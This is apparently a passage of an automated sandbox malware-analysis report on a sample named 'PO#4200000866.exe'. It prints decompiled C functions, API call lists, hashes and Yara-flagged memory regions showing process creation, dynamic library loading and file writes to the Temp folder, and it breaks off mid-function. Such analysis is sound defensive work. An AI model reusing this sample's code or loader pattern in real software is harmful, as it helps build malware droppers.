                                                                                      • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                      • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                      • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                      • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                      • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                                      • Opcode Fuzzy Hash: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                                                      • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405C4B(WCHAR* _a4) {
                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                      				int _t7;
                                                                                      
                                                                                      				0x426750->cb = 0x44;
                                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                                      				if(_t7 != 0) {
                                                                                      					CloseHandle(_v20.hThread);
                                                                                      					return _v20.hProcess;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00405c54
                                                                                      0x00405c74
                                                                                      0x00405c7c
                                                                                      0x00405c81
                                                                                      0x00000000
                                                                                      0x00405c87
                                                                                      0x00405c8b

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3712363035-0
                                                                                      • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                      • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                      • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                      • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406A35(signed int _a4) {
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      				signed int _t10;
                                                                                      
                                                                                      				_t10 = _a4 << 3;
                                                                                      				_t8 =  *(_t10 + 0x40a410);
                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                      				if(_t5 != 0) {
                                                                                      					L2:
                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                      				}
                                                                                      				_t5 = E004069C5(_t8); // executed
                                                                                      				if(_t5 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				goto L2;
                                                                                      			}





                                                                                      0x00406a3d
                                                                                      0x00406a40
                                                                                      0x00406a47
                                                                                      0x00406a4f
                                                                                      0x00406a5b
                                                                                      0x00000000
                                                                                      0x00406a62
                                                                                      0x00406a52
                                                                                      0x00406a59
                                                                                      0x00000000
                                                                                      0x00406a6a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                        • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                        • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                        • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                      • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                      • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                      • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                                      				signed int _t5;
                                                                                      				void* _t6;
                                                                                      
                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                      				return _t6;
                                                                                      			}





                                                                                      0x0040615c
                                                                                      0x00406169
                                                                                      0x0040617e
                                                                                      0x00406184

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 0040615C
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                      • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                      • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                      • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406133(WCHAR* _a4) {
                                                                                      				signed char _t3;
                                                                                      				signed char _t7;
                                                                                      
                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                      				_t7 = _t3;
                                                                                      				if(_t7 != 0xffffffff) {
                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00406138
                                                                                      0x0040613e
                                                                                      0x00406143
                                                                                      0x0040614c
                                                                                      0x0040614c
                                                                                      0x00406155

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405C16(WCHAR* _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                      				if(_t2 == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}




                                                                                      0x00405c1c
                                                                                      0x00405c24
                                                                                      0x00000000
                                                                                      0x00405c2a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                      • GetLastError.KERNEL32 ref: 00405C2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                      • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                      • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                      • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 19%
                                                                                      			E715D2B98(void* __ecx, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				void* _t28;
                                                                                      				void* _t29;
                                                                                      				void* _t33;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      				void* _t45;
                                                                                      				void* _t49;
                                                                                      				signed int _t56;
                                                                                      				void* _t61;
                                                                                      				void* _t70;
                                                                                      				intOrPtr _t72;
                                                                                      				signed int _t77;
                                                                                      				intOrPtr _t79;
                                                                                      				intOrPtr _t80;
                                                                                      				void* _t81;
                                                                                      				void* _t87;
                                                                                      				void* _t88;
                                                                                      				void* _t89;
                                                                                      				void* _t90;
                                                                                      				intOrPtr _t93;
                                                                                      				intOrPtr _t94;
                                                                                      
                                                                                      				if( *0x715d5050 != 0 && E715D2ADB(_a4) == 0) {
                                                                                      					 *0x715d5054 = _t93;
                                                                                      					if( *0x715d504c != 0) {
                                                                                      						_t93 =  *0x715d504c;
                                                                                      					} else {
                                                                                      						E715D30C0(E715D2AD5(), __ecx);
                                                                                      						 *0x715d504c = _t93;
                                                                                      					}
                                                                                      				}
                                                                                      				_t28 = E715D2B09(_a4);
                                                                                      				_t94 = _t93 + 4;
                                                                                      				if(_t28 <= 0) {
                                                                                      					L9:
                                                                                      					_t29 = E715D2AFD();
                                                                                      					_t72 = _a4;
                                                                                      					_t79 =  *0x715d5058;
                                                                                      					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                      					 *0x715d5058 = _t72;
                                                                                      					E715D2AF7();
                                                                                      					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                                                      					 *0x715d5034 = _t33;
                                                                                      					 *0x715d5038 = _t79;
                                                                                      					if( *0x715d5050 != 0 && E715D2ADB( *0x715d5058) == 0) {
                                                                                      						 *0x715d504c = _t94;
                                                                                      						_t94 =  *0x715d5054;
                                                                                      					}
                                                                                      					_t80 =  *0x715d5058;
                                                                                      					_a4 = _t80;
                                                                                      					 *0x715d5058 =  *((intOrPtr*)(E715D2AFD() + _t80));
                                                                                      					_t37 = E715D2AE9(_t80);
                                                                                      					_pop(_t81);
                                                                                      					if(_t37 != 0) {
                                                                                      						_t40 = E715D2B09(_t81);
                                                                                      						if(_t40 > 0) {
                                                                                      							_push(_t40);
                                                                                      							_push(E715D2B14() + _a4 + _v8);
                                                                                      							_push(E715D2B1E());
                                                                                      							if( *0x715d5050 <= 0 || E715D2ADB(_a4) != 0) {
                                                                                      								_pop(_t88);
                                                                                      								_pop(_t45);
                                                                                      								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                      								if(__eflags == 0) {
                                                                                      								}
                                                                                      								asm("loop 0xfffffff5");
                                                                                      							} else {
                                                                                      								_pop(_t89);
                                                                                      								_pop(_t49);
                                                                                      								 *0x715d504c =  *0x715d504c +  *(_t89 + _t49) * 4;
                                                                                      								asm("loop 0xffffffeb");
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t107 =  *0x715d5058;
                                                                                      					if( *0x715d5058 == 0) {
                                                                                      						 *0x715d504c = 0;
                                                                                      					}
                                                                                      					E715D2B42(_t107, _a4,  *0x715d5034,  *0x715d5038);
                                                                                      					return _a4;
                                                                                      				}
                                                                                      				_push(E715D2B14() + _a4);
                                                                                      				_t56 = E715D2B1A();
                                                                                      				_v8 = _t56;
                                                                                      				_t77 = _t28;
                                                                                      				_push(_t68 + _t56 * _t77);
                                                                                      				_t70 = E715D2B26();
                                                                                      				_t87 = E715D2B22();
                                                                                      				_t90 = E715D2B1E();
                                                                                      				_t61 = _t77;
                                                                                      				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                      					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                      				asm("loop 0xfffffff1");
                                                                                      				goto L9;
                                                                                      			}

























                                                                                      0x715d2ba8
                                                                                      0x715d2bb9
                                                                                      0x715d2bc6
                                                                                      0x715d2bda
                                                                                      0x715d2bc8
                                                                                      0x715d2bcd
                                                                                      0x715d2bd2
                                                                                      0x715d2bd2
                                                                                      0x715d2bc6
                                                                                      0x715d2be3
                                                                                      0x715d2be8
                                                                                      0x715d2bee
                                                                                      0x715d2c32
                                                                                      0x715d2c32
                                                                                      0x715d2c37
                                                                                      0x715d2c3c
                                                                                      0x715d2c42
                                                                                      0x715d2c44
                                                                                      0x715d2c4a
                                                                                      0x715d2c57
                                                                                      0x715d2c59
                                                                                      0x715d2c5e
                                                                                      0x715d2c6b
                                                                                      0x715d2c7e
                                                                                      0x715d2c84
                                                                                      0x715d2c8a
                                                                                      0x715d2c8b
                                                                                      0x715d2c91
                                                                                      0x715d2c9d
                                                                                      0x715d2ca3
                                                                                      0x715d2cab
                                                                                      0x715d2cac
                                                                                      0x715d2caf
                                                                                      0x715d2cba
                                                                                      0x715d2cbc
                                                                                      0x715d2cc8
                                                                                      0x715d2cce
                                                                                      0x715d2cd6
                                                                                      0x715d2d02
                                                                                      0x715d2d03
                                                                                      0x715d2d05
                                                                                      0x715d2d09
                                                                                      0x715d2d09
                                                                                      0x715d2d10
                                                                                      0x715d2ce6
                                                                                      0x715d2ce6
                                                                                      0x715d2ce7
                                                                                      0x715d2cf5
                                                                                      0x715d2cfe
                                                                                      0x715d2cfe
                                                                                      0x715d2cd6
                                                                                      0x715d2cba
                                                                                      0x715d2d12
                                                                                      0x715d2d19
                                                                                      0x715d2d1b
                                                                                      0x715d2d1b
                                                                                      0x715d2d34
                                                                                      0x715d2d42
                                                                                      0x715d2d42
                                                                                      0x715d2bf9
                                                                                      0x715d2bfa
                                                                                      0x715d2bff
                                                                                      0x715d2c03
                                                                                      0x715d2c08
                                                                                      0x715d2c1c
                                                                                      0x715d2c1d
                                                                                      0x715d2c1e
                                                                                      0x715d2c20
                                                                                      0x715d2c25
                                                                                      0x715d2c27
                                                                                      0x715d2c27
                                                                                      0x715d2c2a
                                                                                      0x715d2c30
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(00000000), ref: 715D2C57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: bc85312624464f04244ef332f275d30c48a886826ea56f565ce6a35853975d2f
                                                                                      • Instruction ID: ff99894ef28edb5f9803236608a15085571bb300c0ffa868a45cf412a4d37fab
                                                                                      • Opcode Fuzzy Hash: bc85312624464f04244ef332f275d30c48a886826ea56f565ce6a35853975d2f
                                                                                      • Instruction Fuzzy Hash: F341A072508205EFEB1EEFAED9C4B5D37B4EB84314F318827E585C6210D6B89885CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumWindows
                                                                                      • String ID:
                                                                                      • API String ID: 1129996299-0
                                                                                      • Opcode ID: 395fe6804c64e95bf74343090c4268b4f6ae80b980028bcaf89f6c3067d22c7b
                                                                                      • Instruction ID: 230b12baa4d7fb005d938224b447696e17480009c109a8ed5a2252325a385d14
                                                                                      • Opcode Fuzzy Hash: 395fe6804c64e95bf74343090c4268b4f6ae80b980028bcaf89f6c3067d22c7b
                                                                                      • Instruction Fuzzy Hash: AC410D790181C9DFC7298F3488699E9BFA0EF42214F24098FCCC5CE912D7318243DB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 6bf27d1395d6a6e696938770f91b6b95ccf2dec82532b38c657ad8bdbbc28561
                                                                                      • Instruction ID: a6a5f500a2d9f90397b561462f526cc04238f732535371cbe55d2b7e1b28b0fd
                                                                                      • Opcode Fuzzy Hash: 6bf27d1395d6a6e696938770f91b6b95ccf2dec82532b38c657ad8bdbbc28561
                                                                                      • Instruction Fuzzy Hash: EE01D47870235A9BDF34AF5989C0BDD3695AF89B84F45813ADC59DF301C7304A428B81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 33%
                                                                                      			E00402891(intOrPtr __edx, void* __eflags) {
                                                                                      				long _t8;
                                                                                      				long _t10;
                                                                                      				LONG* _t12;
                                                                                      				void* _t14;
                                                                                      				intOrPtr _t15;
                                                                                      				void* _t16;
                                                                                      				void* _t19;
                                                                                      
                                                                                      				_t15 = __edx;
                                                                                      				_pop(ds);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t8 = E00402D84(2);
                                                                                      					_pop(_t14);
                                                                                      					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                                                      					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                                                      					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                                                      						_push(_t10);
                                                                                      						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                      						E004065AF();
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                      				return 0;
                                                                                      			}










                                                                                      0x00402891
                                                                                      0x00402891
                                                                                      0x00402892
                                                                                      0x0040289a
                                                                                      0x0040289f
                                                                                      0x004028a0
                                                                                      0x004028af
                                                                                      0x004028b8
                                                                                      0x004028be
                                                                                      0x00402ba1
                                                                                      0x00402ba4
                                                                                      0x00402ba4
                                                                                      0x004028b8
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                                                      • Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
                                                                                      • Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                                                      • Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00401735() {
                                                                                      				long _t5;
                                                                                      				WCHAR* _t8;
                                                                                      				WCHAR* _t11;
                                                                                      				void* _t14;
                                                                                      				long _t17;
                                                                                      
                                                                                      				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
                                                                                      				_t17 = _t5;
                                                                                      				if(_t17 == 0) {
                                                                                      					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                                                      					 *_t11 = _t8;
                                                                                      				}
